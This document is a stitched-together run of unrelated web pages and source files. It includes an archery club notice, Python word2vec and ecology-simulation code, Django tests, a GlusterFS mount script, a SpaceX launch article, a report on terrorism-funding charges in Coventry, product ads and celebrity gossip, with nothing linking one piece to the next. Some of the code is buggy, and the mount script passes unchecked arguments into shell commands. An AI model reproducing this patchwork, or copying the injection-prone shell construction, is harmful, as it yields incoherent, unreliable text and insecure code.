All are welcome! Come to socialize or learn how to shoot! We have bows and arrows available for use on the day. Please note that minors must be accompanied by a parent or guardian at all times. If you don’t feel like doing archery, then bring a chair and sit under the shade to watch the archers, have a chat and work on your current A&S projects. Clubrooms are also available. |
# -*- coding: utf-8 -*-
import gensim
import jieba
import pandas as pd
from tqdm import tqdm
from datetime import datetime
class yjiang(object):
def __init__(self):
self.idx2id = None
self.raw_sentence = None
self.preprocess_sentence = None
self.vecs = None
self.alternative_words = set()
def load_raw(self, file_path):
data = pd.read_csv(file_path)
self.idx2id = data["productid"].to_dict()
self.raw_sentence = data[u"commentcontent"].map(str).tolist()
def preprocess(self):
cut_sentence = [list(jieba.cut(s)) for s in tqdm(self.raw_sentence)]
        self.preprocess_sentence = cut_sentence  # stop words may still need to be removed here
def train_wordvec(self, param="default"):
if param == "default":
param = {
"size": 100, # Word vector dimensionality
"min_count": 5, # Minimum word count
"workers": 4, # Number of threads to run in parallel
"window": 10, # Context window size
"sample": 1e-3 # Downsample setting for frequent words
}
print "\n{} Training wordvector ...".format(datetime.now())
model = gensim.models.Word2Vec(self.preprocess_sentence, seed=1, **param)
model.init_sims(replace=True)
print "\n{} Saving wordvector ...".format(datetime.now())
model.save("{}features_{}mincount_{}windowsize".format(param["size"], param["min_count"], param["window"]))
def load_wordvec(self, filename, test=False):
self.vecs = gensim.models.Word2Vec.load(filename)
if test:
print self.vecs.most_similar(u"不错")
print "Successfully!"
def find_alternative_words(self, threshold=0.9, k=5):
print "{} Finding alternative words ...".format(datetime.now())
for w in tqdm(self.vecs.vocab):
            t = self.vecs.most_similar(w, topn=k)
i = 0
while i < k:
if t[i][1] >= threshold:
self.alternative_words.add((w, t[i][0]) if w > t[i][0] else (t[i][0], w))
else:
break
i += 1
def run(self, file_path):
self.load_raw(file_path)
self.preprocess()
self.train_wordvec()
self.load_wordvec('100features_5mincount_10windowsize')
self.find_alternative_words()
print "\n", self.alternative_words.__len__()
if __name__ == "__main__":
tt = yjiang()
tt.run("text.csv")
|
Real Estate Agents: Are You Looking for Permanent Answers to the Removal of Smoke and Other Difficult Odors in Properties That You Have Listed or Want to List?
When your clients need these important services, why not offer them one that can guarantee 100% removal with no chemical residue or harm to the structure?
That’s where Just Gone Sanitizing & Deodorizing System™ comes in and makes you look like the proverbial Super Hero! Where others spend hours and even days trying to rid homes of their horrible odors that keep them from selling for top dollar, we can come in and in no time permanently remove the most intractable smells, even dead body odors!
Whether the odor is airborne or has penetrated textiles, floor coverings, and even wall coverings and paint, our Just Gone Sanitizing & Deodorizing System™ can get all of them out…Permanently!
Just a few of the odors that, with the Just Gone Sanitizing™ System, are well…just gone!
With Just Gone Sanitizing & Deodorizing System™ there is literally nothing that you cannot tackle and come out successful, all the while making your clients happy, not to mention the all-important buyers. |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# This file is part of truck
# <truck - test-friendly event bus layer on top of django signals>
# Copyright (C) <2012> Gabriel Falcão <[email protected]>
# Copyright (C) <2012> Yipit Inc. <[email protected]>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from mock import patch, call
from truck.core import Loader
@patch('truck.core.importlib')
@patch('truck.core.imp')
def test_loader_should_be_able_to_load_a_single_module(imp, importlib):
u"Loader should be able to load a listener from a module"
importlib.import_module.return_value.__path__ = '/some/path'
Loader.import_listener_from_module('deal')
imp.find_module.assert_called_once_with('listeners', '/some/path')
importlib.import_module.assert_has_calls([
call('deal'),
call('deal.listeners'),
])
@patch('truck.core.importlib')
@patch('truck.core.imp')
def test_loader_should_ignore_if_there_is_no_such_app(imp, importlib):
"Loader should ignore when the app does not exist"
importlib.import_module.side_effect = (
AttributeError('there is no such module'))
Loader.import_listener_from_module('deal')
importlib.import_module.assert_called_once_with('deal')
assert not imp.find_module.called
@patch('truck.core.importlib')
@patch('truck.core.imp')
def test_loader_should_ignore_if_there_are_no_listeners(imp, importlib):
"Loader should ignore when the app does not exist"
importlib.import_module.return_value.__path__ = '/some/path'
imp.find_module.side_effect = ImportError('LOL')
Loader.import_listener_from_module('deal')
importlib.import_module.assert_called_once_with('deal')
imp.find_module.assert_called_once_with('listeners', '/some/path')
@patch.object(Loader, 'import_listener_from_module')
@patch('truck.core.settings')
def test_loader_start_maps_installed_apps(
settings, import_listener_from_module):
"Loader.start() should ignore when the app does not exist"
settings.INSTALLED_APPS = ['chuck', 'norris']
Loader.start()
import_listener_from_module.assert_has_calls([
call('chuck'),
call('norris'),
])
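# For reference, a minimal Loader sketch that satisfies the four tests above.
# This is an assumption for illustration -- the real truck.core implementation
# may differ in details. (Named LoaderSketch to avoid shadowing the import.)
import imp
import importlib
from django.conf import settings

class LoaderSketch(object):
    @classmethod
    def import_listener_from_module(cls, module_name):
        try:
            module = importlib.import_module(module_name)
        except AttributeError:
            return  # no such app: silently ignored
        try:
            imp.find_module('listeners', module.__path__)
        except ImportError:
            return  # app exists but has no listeners module: also ignored
        importlib.import_module('%s.listeners' % module_name)

    @classmethod
    def start(cls):
        for app in settings.INSTALLED_APPS:
            cls.import_listener_from_module(app)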
|
SpaceX's Falcon 9 rocket and the DSCOVR space-weather satellite on the launch pad at Florida's Cape Canaveral Air Force Station. Launch is scheduled for the evening of Feb. 11, 2015.
SpaceX has scaled back the daring rocket-landing test that it plans to perform after it launches a space weather satellite today (Feb. 11).
The private spaceflight company had intended to try landing the first stage of its Falcon 9 rocket on an "autonomous spaceport drone ship" in the Atlantic Ocean during today's liftoff of the Deep Space Climate Observatory (DSCOVR), which is scheduled to take place at 6:03 p.m. EST (2303 GMT) from Florida's Cape Canaveral Air Force Station. You can watch the SpaceX launch live online, courtesy of NASA TV, beginning at 5 p.m. EST (2200 GMT).
But rough seas have scuttled that plan.
"The drone ship was designed to operate in all but the most extreme weather. We are experiencing just such weather in the Atlantic, with waves reaching up to three stories in height crashing over the decks," SpaceX representatives wrote in an update today. The drone ship, called "Just Read the Instructions," is named after a fictional sentient colony ship from the science fiction novels of author Iain M. Banks.
"Also, only three of the drone ship's four engines are functioning, making station-keeping in the face of such wave action extremely difficult," SpaceX representatives wrote in the statement. "The rocket will still attempt a soft landing in the water through the storm (producing valuable landing data), but survival is highly unlikely."
"Because DSCOVR is traveling to deep space, the moon's location on Feb. 12 through 19 would be close enough to DSCOVR to affect the spacecraft's trajectory," NASA officials wrote in a blog post today. "This would require performing mid-course correction burns that would use more fuel than what is planned for the mission. After today, the next launch opportunity would be on Friday, Feb. 20, at 5:43:44 p.m. EST."
Weather forecasts predict a 90 percent chance of good conditions at the launch pad today, and more manageable high-altitude winds, they added.
The $340 million DSCOVR mission, a joint project of the National Oceanic and Atmospheric Administration, NASA and the U.S. Air Force, is headed for the Earth-sun Lagrange Point 1, a gravitationally stable spot in space about 930,000 miles (1.5 million kilometers) from Earth. The spacecraft is designed to watch for strong solar storms that could affect power grids and satellite operations here on Earth.
The DSCOVR project began in 1998 as Triana, an Earth-observing mission championed by then-Vice President Al Gore. It was mothballed in 2001, then resurrected as a space-weather effort in 2009.
The rocket-flyback maneuver is part of SpaceX's effort to develop fully and rapidly reusable rockets, a key priority of the company and its billionaire founder and CEO, Elon Musk.
SpaceX has already succeeded in bringing a Falcon 9 first stage down for a soft ocean splashdown. Last month, the company tried the bold boat landing for the first time and nearly pulled it off: The rocket stage hit its target but came down too hard and exploded on the deck.
Editor's Note: This story was updated at 2:45 p.m. EST to reflect SpaceX's decision not to pursue the drone ship landing with the Falcon 9 rocket stage. |
#!/usr/bin/env python3
"""Module providing an AnsiParseTreeWriter for formatted printing of
ptTools.ParseTreeNodes to an output channel on linux systems."""
__all__ = [
'BLINK',
'BOLD',
'COLOR',
'COLORS',
'COMMENT',
'PRECEDENCE',
'UNDERLINE',
'AnsiParseTreeWriter',
]
from .verbosewriter import VerboseParseTreeWriter
BLINK = 'blink'
BOLD = 'bold'
COLOR = 'color'
COLORS = 'colors'
COMMENT = 'comment'
PRECEDENCE = 'precedence'
UNDERLINE = 'underline'
class AnsiParseTreeWriter(VerboseParseTreeWriter):
"""Writer for printing attributed ptTools.ParseTreeNodes to an
output channel on linux systems.
Note that the ansi markup sequence behaves differently from
e.g. html. A closing markup closes all opened markups. However,
opening sequences CAN be nested, but are all closed when
encountering the closing sequence.
The current style description is updated while traversing
non-terminal nodes, but not written until reaching a terminal.
Every token is embraced in its own opening and closing markup
sequence.
"""
## ANSI print sequence:
## {ESC}[{ATTR};{BG};{256colors};{FG}m
## e.g.: "\033[38;5;255mfoobar\033[39m"
_ansi_constants = {'ESC': '\033',
'BG': '5',
'FG': '0',}
def __init__(self, out):
"""Initialized with an output channel."""
super().__init__(out)
self._style = {}
"""The currently queued style dictionary."""
def _ansi_dict_from(self, style):
"""Converts style dictionary to ansi description dictionary."""
        ## Order of attributes IS significant!
attr = '38'
if style.get(BLINK):
attr = '5;' + attr
if style.get(UNDERLINE):
attr = '4;' + attr
if style.get(BOLD):
attr = '1;' + attr
ansidict = {'ATTR': attr,
'CLR' : style.get(COLOR,'')}
ansidict.update(self._ansi_constants)
return ansidict
def _get_node_style(self, node):
"""Retrieves all inherited attributes of node and merges them
to one style dictionary.
Called from super.write_node(node).
"""
return node.all_attributes
def _get_token_style(self, tok):
"""Retrieves all attributes of token and returns style
dictionary.
Called from super.write_token(token).
"""
return tok.attributes
def _write_closing_markup(self, style=None):
"""Writes ansi style closing sequence to self.out, and clears
queued style information."""
self._write_closing_markup_raw(self._style)
self._style = {}
def _write_closing_markup_raw(self, style):
"""Writes ansi style closing sequence to self.out without
altering the queued style description."""
if style:
self._write_str("{ESC}[{FG}m".format(**self._ansi_constants))
def _write_leaf(self, node):
"""Writes terminal node with its tokens."""
if not node.tokens:
return
else:
## Tokens except the last token in terminalnode.tokens
## define their markup themselves, whereas the last token
## receives its node's markups.
for tok in node.tokens[:-1]:
token_style = self._get_token_style(tok)
self._write_opening_markup_raw(token_style)
super()._write_token(tok)
self._write_closing_markup_raw(token_style)
self._write_token(node.token) ## (last token).
def _write_opening_markup(self, style):
"""Queues style dictionary for output.
This method reimplements its superclass method. Called for
each node with the intention to write opening markups to
self.out. Here, we only queue the style information as we may
have to insert tokens with different markups, before.
"""
if style:
self._style.update(style)
def _write_opening_markup_raw(self, style):
"""Writes opening sequence as described by ansi_dict to
self.out, without altering the queued style description."""
if style:
ansi_dict = self._ansi_dict_from(style)
self._write_str('{ESC}[{ATTR};{BG};{CLR}m'.format(**ansi_dict))
def _write_indent(self, tok):
"""Calls super.
        TODO - Suspend markup (to avoid preceding underlines in
        multiline comments).
"""
super()._write_indent(tok)
def _write_spacing(self, tok):
"""Calls super.
        TODO - Suspend markup (to avoid preceding underlines in
        multiline comments).
"""
super()._write_spacing(tok)
def _write_token(self, tok):
"""Writes token and markups to self.out."""
self._write_opening_markup_raw(self._style)
super()._write_token(tok)
self._write_closing_markup_raw(self._style)
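# Standalone illustration of the ANSI sequence scheme documented above --
# the same {ESC}[{ATTR};{BG};{CLR}m opening and {ESC}[0m closing that the
# writer emits (runs in any 256-color-capable terminal):
if __name__ == '__main__':
    ESC = '\033'
    for clr in (196, 46, 21):  # 256-color codes for red, green and blue
        print('{esc}[1;38;5;{clr}msample text {clr}{esc}[0m'.format(esc=ESC, clr=clr))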
|
When the independent agency is the Milwaukee Area Investigative Team (MAIT), and the West Allis Police Department serves as the lead investigative agency for MAIT, it provides a complete report to the prosecutor for review. If the prosecutor determines there is no basis for prosecution of the law enforcement officer, access to the report as required by § 175.47(5)(b) will be posted below. The related investigative file and associated evidence will be made available to the public upon request, in a redacted format, under the Wisconsin Public Records Law (Wisconsin Statutes §§ 19.31-19.39). |
'''
MIT License
Copyright (c) 2017 grokkers
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
'''
class NotResponding(Exception):
def __init__(self):
self.code = 504
self.error = 'API request timed out, please be patient.'
super().__init__(self.error)
class RequestError(Exception):
'''Base class for request errors'''
def __init__(self, resp, data):
self.response = resp
self.code = resp.status
self.method = resp.method
self.reason = resp.reason
self.error = data.get('error')
if 'message' in data:
self.error = data.get('message')
self.fmt = '{0.reason} ({0.code}): {0.error}'.format(self)
super().__init__(self.fmt)
class NotFoundError(RequestError):
'''Raised if the player/clan is not found.'''
pass
class ServerError(RequestError):
'''Raised if the api service is having issues'''
pass |
Our volume boosters by Fairchild are most commonly used to supply a higher but precise pressure to a particular line or control device. They take an unregulated supply line pressure and convert it to a well regulated, highly controlled pressure as required by the operation. Volume boosters also are used as part of an interface between pneumatic and electric circuits. Our volume boosters feature high flow capacity and a fast response. We offer a wide range of signal to output pressure ratios, pilot operated, various pipe sizes and accessories and options to meet your unique needs.
Forward/Exhaust Flow No Bleed Boosters available in a number of configurations essentially are used to convert a low flow signal to a high flow output.
Forward/Exhaust High Flow No Bleed Volume Boosters provide high capacity, fast response in a cost effective manner.
Forward/Exhaust High Flow No Bleed Volume Booster with Bypass Valve is specifically designed for accurate control in valve and valve actuation systems.
Forward Ultra High Flow Volume Boosters, as the name suggests, provide significantly increased forward flow capability when needed.
Forward/Exhaust Ultra High Flow Volume Boosters are also available to supply very high flow capacity in both forward and exhaust modes. |
from __future__ import division
from random import shuffle, choice, randint, seed
from os.path import expanduser
from numpy import log10
from scipy import stats
import numpy as np
import time
import math
import copy
import sys
import os
from pprint import pprint as pp
mydir = expanduser("~/")
sys.path.append(mydir + "GitHub/Emergence-Senescence/model")
GenPath = mydir + "GitHub/Emergence-Senescence/results/simulated_data/"
col_headers = 'sim,r,gr,mt,q,rls_min,rls_max,grcv,mtcv,rlscv,ct,rlsmean,rlsvar,total.abundance,species.richness'
OUT = open("/gpfs/home/r/z/rzmogerr/Carbonate/SSTOSIMPLE.csv", 'w+')
print>>OUT, col_headers
OUT.close()
senesce_simple = lambda age, rls: (1-(age/(rls+0.01)))
#senesce_simple = lambda age, rls: 1
tradeoff_reverse_logistic = lambda rls: 2 / (2 + math.exp((0.2*rls)-8))#in the full implementation, don't enforce these parameters
#tradeoff_reverse_logistic = lambda rls: 2 / (2 + math.exp((0.2*rls)-4))
#tradeoff_reverse_logistic = lambda rls: rls/rls
g0delay = lambda rls: 1 / (1 + (rls/100))
#competitive_growth = lambda age:
def output(iD, sD, rD, sim, ct, r):
IndIDs, SpIDs = [], []
for k, v in iD.items():
IndIDs.append(k)
SpIDs.append(v['sp'])
#pp(IndIDs)
#pp(SpIDs)
N = len(IndIDs)
R = len(rD.items())
S = len(list(set(SpIDs)))
#RLSL=[]
#for i in IndIDs:
# RLSL.append(iD[i]['rls'])
RLSL=[iD[i]['rls'] for i in IndIDs]
rlsmean = np.mean(RLSL)
rlsvar = np.var(RLSL)
if N > 0:
#OUT = open(GenPath + 'SimData.csv', 'a')
OUT=open("/gpfs/home/r/z/rzmogerr/Carbonate/SSTOSIMPLE.csv","a")
outlist = [sim, r, gr, mt, q, rls_min, rls_max, grcv, mtcv, rlscv, ct, rlsmean, rlsvar, N, S]
outlist = str(outlist).strip('[]')
outlist = outlist.replace(" ", "")
print>>OUT, outlist
OUT.close()
try:
print 'sim:', '%3s' % sim, 'ct:', '%3s' % ct,' N:', '%4s' % N, ' S:', '%4s' % S, ' R:', '%4s' % R, 'LSm:' '%1s' % rlsmean, 'LSv:' '%2s' % rlsvar
except UnboundLocalError:
print 'ERROR: N=0'
return
def immigration(sD, iD, ps, sd=1):
r, u, gr, mt, q, rls_min, rls_max, grcv, mtcv, rlscv, efcv, a = ps
for j in range(sd):
if sd == 1 and np.random.binomial(1, u) == 0: continue
p = np.random.randint(1, 1000)
if p not in sD:
sD[p] = {'gr' : 10**np.random.uniform(gr, 0)}
sD[p]['mt'] = 10**np.random.uniform(mt, 0)
sD[p]['rls'] = 50#randint(rls_min,rls_max)
sD[p]['grcv']=10**np.random.uniform(-6.01,grcv)
sD[p]['mtcv']=10**np.random.uniform(-6.01,mtcv)
sD[p]['rlscv']=.15#10**np.random.uniform(-6.01,rlscv)
sD[p]['efcv']=10**np.random.uniform(-6.01,efcv)
es = np.random.uniform(1, 100, 3)
sD[p]['ef'] = es/sum(es)
sD[p]['a']=a
ID = time.time()
iD[ID] = copy.copy(sD[p])
iD[ID]['sp'] = p
iD[ID]['age']=np.random.geometric(.5)-1
#iD[ID]['age']=0#doesn't need to start with age==0...
iD[ID]['x'] = 0
iD[ID]['y'] = 0
iD[ID]['rls']=sD[p]['rls']; iD[ID]['mt']=sD[p]['mt']; iD[ID]['ef']=sD[p]['ef'];iD[ID]['gr']=sD[p]['gr'];iD[ID]['a']=sD[p]['a']
iD[ID]['q'] = 10**np.random.uniform(0, q)
return [sD, iD]
def consume(iD, rD, ps):
r, u, gr, mt, q, rls_min, rls_max, grcv, mtcv, rlscv, efcv, a = ps
keys = list(iD)
shuffle(keys)
for k in keys:
if len(list(rD)) == 0: return [iD, rD]
c = choice(list(rD))
e = iD[k]['ef'][rD[c]['t']] * iD[k]['q']#why does this dep on the indiv's q?
#pp(iD[k]['ef'][rD[c]['t']])
#pp(e)
#To account for the Frenk et al. 2017, one idea that you had was to make the indiv a generalist by taking a max of
#iD[k]['ef'][rD[c]['t']] and another number (e.g., (1/3))
#but it would be better to do some distrn that has age as a param, so that it is generalizable and can be randomized.
iD[k]['q'] += min([rD[c]['v'], e])
rD[c]['v'] -= min([rD[c]['v'], e])
if rD[c]['v'] <= 0: del rD[c]
return [iD, rD]
def grow(iD):
for k, v in iD.items():
m = v['mt']
iD[k]['q'] -= v['gr'] * (v['q'])
        if v['age']==0 and v['q'] < m/(0.5+v['a'])*(0.5-v['a']):  # daughters are born in G0 phase; we know
        # they're smaller in G0. We don't want to kill them all because of it, though
del iD[k]
elif v['q'] < m:
del iD[k]
return iD
def maintenance(iD):#mt is less for juveniles
for k, v in iD.items():
if v['age']==0:
iD[k]['q'] -= v['mt']/(0.5+v['a'])*(0.5-v['a'])
if v['q'] < v['mt']/(0.5+v['a'])*(0.5-v['a']): del iD[k]
else:
iD[k]['q'] -= v['mt']
if v['q'] < v['mt']: del iD[k]
return iD
def reproduce(sD, iD, ps, p = 0):
for k, v in iD.items():
if v['gr'] > 1 or v['gr'] < 0:
del iD[k]
elif v['q'] > v['mt']/(0.5+v['a']) and np.random.binomial(1, v['gr']) == 1:
if v['age'] >= v['rls'] or v['mt']<0:
del iD[k]
else:
iD[k]['q'] = v['q']*(0.5+v['a'])
grorig=(v['gr'])/(senesce_simple(v['age'],v['rls']))
iD[k]['gr']=v['gr']/(senesce_simple((v['age']-1),v['rls']))*(senesce_simple(v['age'],v['rls']))
#modifier based on the newly incremented age value, after removing the gr reduction due to previous age
#in full implementation the sscnc model will be chosen at random from a list of choices
i = time.time()
iD[i] = copy.deepcopy(iD[k])
iD[k]['age']+=1
#in addition to copying physiology, need to copy the rlsmax---
#rlsmax is determined genetically so there should be a chance of mutation, here with normally distributed
#effect sizes
iD[i]['rls']=np.random.normal((v['rls']),sD[v['sp']]['rlscv']*v['rls'],None)
#pp(iD[k]['age']);pp(iD[k]['rls'])
try:
iD[i]['gr']=np.random.normal(grorig,(sD[v['sp']]['grcv']*grorig),None)#these should not be normal distrns, should be negv-biased
iD[i]['mt']=np.random.normal(v['mt'],sD[v['sp']]['mtcv']*v['mt'],None)
#is total ef allowed to != 1
except ValueError:
del iD[i]; continue
if iD[i]['gr'] > 1 or iD[i]['gr'] < 0:
del iD[i]; continue
iD[i]['q']=(v['q'])/(0.5+v['a'])*(0.5-v['a'])
iD[i]['age']=0
return [sD, iD]
def iter_procs(iD, sD, rD, ps, ct):
procs = range(6)
shuffle(procs)
for p in procs:
if p == 0: rD = ResIn(rD, ps)
elif p == 1: pass#sD, iD = immigration(sD, iD, ps)
elif p == 2: iD, rD = consume(iD, rD, ps)
elif p == 3: iD = grow(iD)
elif p == 4: iD = maintenance(iD)
elif p == 5: sD, iD = reproduce(sD, iD, ps)
N = len(list(iD))
return [iD, sD, rD, N, ct+1]
def ResIn(rD, ps):
r, u, gr, mt, q, rls_min, rls_max, grcv, mtcv, rlscv, efcv, a = ps
for i in range(r):
p = np.random.binomial(1, u)
if p == 1:
ID = time.time()
rD[ID] = {'t' : randint(0, 2)}
rD[ID]['v'] = 10**np.random.uniform(0, 2)
return rD
def run_model(sim, gr, mt, q, rls_min, rls_max, grcv, mtcv, rlscv, efcv, a=0, rD = {}, sD = {}, iD = {}, ct = 0, splist2 = []):
print '\n'
rD={};iD={};sD={}
if iD=={} and sD=={} and rD=={}:
pass
else:
sys.exit()
r = choice([10,100])#10**randint(0, 2)
u = 10**np.random.uniform(-2, 0)
ps = r, u, gr, mt, q, rls_min, rls_max, grcv, mtcv, rlscv, efcv, a
sD, iD = immigration(sD, iD, ps, 1000)#this is the initial number of indivs
while ct < 2000:#this is the number of timesteps
if ct < 1:
print str(rls_min) + ' ' + str(rls_max) + " " + str(r)
iD, sD, rD, N, ct = iter_procs(iD, sD, rD, ps, ct)
if (ct > 1400 and ct%100 == 0) or (ct == 1):
output(iD, sD, rD, sim, ct, r)
for sim in range(500):#number of different models run (had been set at 10**6)
seed(time.time())
gr = np.random.uniform(-2,-1)
mt = np.random.uniform(-2,-1)
rls_min = randint(1,10)
rls_max = randint(rls_min,100)
grcv = np.random.uniform(-6,-0.3)
mtcv = np.random.uniform(-6,-0.3)
rlscv = np.random.uniform(-6,-0.3)
efcv = np.random.uniform(-6,-0.3)
q = choice([1, 2])
a=.35#a can take values [0,0.5)
run_model(sim, gr, mt, q, rls_min, rls_max, grcv, mtcv, rlscv, efcv, a)
|
A mother-of-two from Coventry appeared in court yesterday accused of providing weapons and military equipment to a terrorist group allegedly linked to al Qaida.
Frzana Khan (41), from Anerly Way, is charged with two counts of conspiracy to provide money and other property to Lashkar-e-Tayyiba, a Kashmiri separatist group.
She appeared before Bow Street Magistrates' Court in central London along with Mohammed Ajmal Khan (30) and Palvinder Singh (29).
Both Khan, of Broad Street, Coventry, and Singh, of Freeman Street, Coventry, are also each charged with two counts of conspiracy to provide funds and other equipment to the group.
Mohammed Khan is also charged with directing part of the Kashmiri separatist group and with being a member of the group, a "proscribed" organisation.
All three defendants are alleged to have supported the organisation by providing funds and other equipment, including Kevlar, high technology equipment and firearms that could be used for military purposes.
All three were remanded in custody to reappear before the Old Bailey on March 14. |
import json
import os
import sys
import logging
from subprocess import Popen, PIPE
def mkdir(directory):
if not os.path.isdir(directory):
cmd = 'mkdir -p %s' % directory
        Popen(cmd, shell=True).wait()  # block until the directory exists before it is used
def mount(entry_point, mount_point):
# Check if the mount point exists. If not
# go ahead and create it.
# mount -t glusterfs entry_point mount_point
cmd = 'mount -t glusterfs %s %s' % (entry_point,
mount_point)
output = Popen(cmd, stdout=PIPE, shell=True).stdout.read()
logging.info(cmd)
logging.info(output)
def umount(mount_point):
    cmd = 'cat /etc/mtab | grep %s | awk \'{print $2}\'' % mount_point
output = Popen(cmd, stdout=PIPE, shell=True).stdout.read()
if output.strip() != "":
cmd = 'umount %s' % mount_point
output = Popen(cmd, stdout=PIPE, shell=True).stdout.read()
logging.info(cmd)
logging.info(output)
cmd = sys.argv[1]
if cmd == "mount":
entry = sys.argv[2]
mkdir('/service/data')
mount(entry, '/service/data')
elif cmd == "umount":
umount('/service/data')
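# Example invocations (script, host and volume names are illustrative --
# the actual file name is not shown in this excerpt):
#   python mounter.py mount gluster-server:/datavol
#   python mounter.py umount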
|
The Frank Wright Cypress is a timeless and fashionable brogue boot. This lace-up style sits above the ankle and looks great when styled with jeans. Features include traditional brogue stitching, a lace-up front and chunky stitching to the sole unit. Subtle branding details include the Frank Wright pull tab and cross stitching at the back of the boot. |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
'''
Copyright (C) 2011-2015 German Aerospace Center DLR
(Deutsches Zentrum fuer Luft- und Raumfahrt e.V.),
Institute of System Dynamics and Control
All rights reserved.
This file is part of PySimulator.
PySimulator is free software: you can redistribute it and/or modify
it under the terms of the GNU Lesser General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
PySimulator is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU Lesser General Public License for more details.
You should have received a copy of the GNU Lesser General Public License
along with PySimulator. If not, see www.gnu.org/licenses.
'''
import csv, numpy, collections
from .. import IntegrationResults
fileExtension = 'csv'
description = 'Comma Separated Values for FMI Compliance Checker'
class Results(IntegrationResults.Results):
''' Class for hosting simulation results in csv format:
First row: Names of variables
First column: Independent variable, e.g. Time
Example:
Time,Mechanical.Inertia.J,y,Mechnical.Inertia.w
0.0,20.0,3.6820238572822689e-4,0.0
0.1,20.0,6.7829872398723383e-4,0.7293789273984797e-2
0.2,20.0,4.0290389058209473e-3,0.7823794579232536e-1
'''
def __init__(self, fileName):
IntegrationResults.Results.__init__(self)
self.fileName = fileName # File name of result file
''' Load file
'''
'''
csvfile = open(self.fileName, 'rb')
reader = csv.reader(csvfile, delimiter=';')
self._name = reader.next() # first row contains the variable names
self._data = numpy.array(reader.next(), dtype='float64')
i=0
for row in reader:
self._data = numpy.row_stack((self._data, numpy.array(row, dtype='float64')))
print i
i=i+1
csvfile.close()
'''
csvfile = open(self.fileName, 'rb')
dialect = csv.Sniffer().sniff(csvfile.readline())
csvfile.seek(0)
reader = csv.reader(csvfile, dialect)
self._name = reader.next() # first row contains the variable names
self._info = len(self._name) * ['']
self._filterName()
data = numpy.loadtxt(csvfile, delimiter=dialect.delimiter)
t = data[:, 0]
self.timeSeries.append(IntegrationResults.TimeSeries(t, data, "linear"))
self.nTimeSeries = len(self.timeSeries)
csvfile.close()
self.isAvailable = True # Shows, if there is a file available to be read
def _filterName(self):
for i in xrange(len(self._name)):
x = self._name[i]
k = x.find('=')
if k > -1: # Skip the parts behind "="
self._info[i] = x[k:]
x = x[:k]
if len(x) > 5: # Convert der(a.b.c.d) to a.b.c.der(d)
if x[:4] == 'der(':
k = x.rfind('.')
if k > -1:
x = x[4:k] + '.der(' + x[k + 1:]
self._name[i] = x
    def readData(self, variableName):
        if variableName not in self._name:  # list.index would raise ValueError
            return None, None, None
        nameIndex = self._name.index(variableName)
y = self.timeSeries[0].data[:, nameIndex]
t = self.timeSeries[0].independentVariable
method = self.timeSeries[0].interpolationMethod
return t, y, method
    def data(self, variableName):
        if variableName not in self._name:  # list.index would raise ValueError
            return None
        nameIndex = self._name.index(variableName)
return self.timeSeries[0].data[:, nameIndex]
def getVariables(self):
# Generate the dict
variables = dict()
# Fill the values of the dict
for i in xrange(len(self._name)):
name = self._name[i]
variability = 'continuous'
value = None
infos = collections.OrderedDict()
infos['Variability'] = variability
if not self._info[i] == '':
infos['Description'] = self._info[i]
unit = None
seriesIndex = 0
column = i
sign = 1
variables[name] = IntegrationResults.ResultVariable(value, unit, variability, infos, seriesIndex, column, sign)
return variables
def getFileInfos(self):
# No relevant file infos stored in a csv result file
return dict()
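# Minimal usage sketch (illustration only, not part of PySimulator; assumes a
# result file shaped like the example in the class docstring above):
if __name__ == '__main__':
    results = Results('result.csv')
    t, y, method = results.readData('y')  # independent variable, data column, 'linear'
    print sorted(results.getVariables().keys())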
|
STAR SIGHTINGS: Madonna Raises Millions for Charity, Jordan Rodgers Returns to 'Bachelor' Mansion and More!
ET has details on what some of your favorite celebs were up to recently that might have flown under your radar.
Throughout the evening of Madonna's ultra-VIP charity event at Miami's Art Basel on Dec. 2, guests were urged by the hostess to take advantage of the ever-flowing Perrier-Jouët Belle Epoque at their tables to help them dig deeper into their pockets to contribute to the cause.
Madonna's celeb friends like Ariana Grande, Sean Penn, Chris Rock, Alex Rodriguez, Dave Chappelle, Karolina Kurkova, and David Blaine participated in the auction, where over $7.5 million was raised. James Corden served as Master of Ceremonies and kicked off the night saying, "let's toast with Perrier-Jouët for Raising Malawi," at Madonna's star-studded charity bash with cuvées provided by the iconic champagne house.
The day before on the opposite coast, Michael Phelps was on hand to present the Best eSports Player of the Year to Marcelo "Coldzero" David at The Game Awards 2016 in Los Angeles.
Also on Dec. 1, Kendall Jenner's rumored beau A$AP Rocky took pictures in the photo booth and spent some time with Russell Simmons at the 7th Annual Bombay Sapphire Artisan Series Finale Party -- hosted by Russell and Danny Simmons -- at Art Basel in Miami.
The same day, Bravo stars Lilly Ghalichi of Shahs of Sunset and Gretchen Rossi from Real Housewives of Orange County posed for photos together at HAIRtamin "Goes Hollywood" at Warwick in Los Angeles.
